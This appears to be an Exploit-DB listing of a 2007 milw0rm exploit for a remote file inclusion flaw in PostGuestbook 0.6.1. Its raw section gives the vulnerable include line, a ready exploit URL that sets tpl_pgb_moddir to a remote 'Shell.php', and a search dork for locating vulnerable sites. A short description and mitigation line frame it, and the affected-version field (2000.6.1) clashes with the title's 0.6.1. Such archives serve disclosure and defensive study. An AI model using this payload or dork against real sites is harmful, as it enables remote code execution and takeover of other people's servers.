header-logo
Suggest Exploit
vendor:
PostGuestbook
by:
GloD_M = [Mahmood_ali]
5.5
CVSS
MEDIUM
Remote File Inclusion
CWE
Product Name: PostGuestbook
Affected Version From: 2000.6.1
Affected Version To: 2000.6.1
Patch Exists: NO
Related CWE:
CPE:
Metasploit:
Other Scripts:
Platforms Tested:
2007

PostGuestbook 0.6.1(tpl_pgb_moddir)Remote File Include Expliot

This exploit takes advantage of a remote file inclusion vulnerability in PostGuestbook version 0.6.1. By manipulating the 'tpl_pgb_moddir' parameter in the URL, an attacker can include a malicious file (in this case, 'Shell.php') and execute arbitrary code on the target system.

Mitigation:

The recommended mitigation for this vulnerability is to update to a patched version of PostGuestbook or to disable the affected module.
Source

Exploit-DB raw data:

# PostGuestbook 0.6.1(tpl_pgb_moddir)Remote File Include Expliot
# D.Script: http://sourceforge.net/projects/postguestbook/
# Dork: "Powered by: PostGuestbook 0.6.1"
# Discovered by GloD_M = [Mahmood_ali]
# Homepage: http://www.Tryag.cc
# Greetz To Tryag-Team & 4lKaSrGoLd3n-Team & AsbMay's Group
# V.Code
# include "$tpl_pgb_moddir/styles/$tpl_style/error.php";
# Exploit:
# [VicTim]/modules/postguestbook/styles/internal/header.php?tpl_pgb_moddir=Shell.php?

# milw0rm.com [2007-03-07]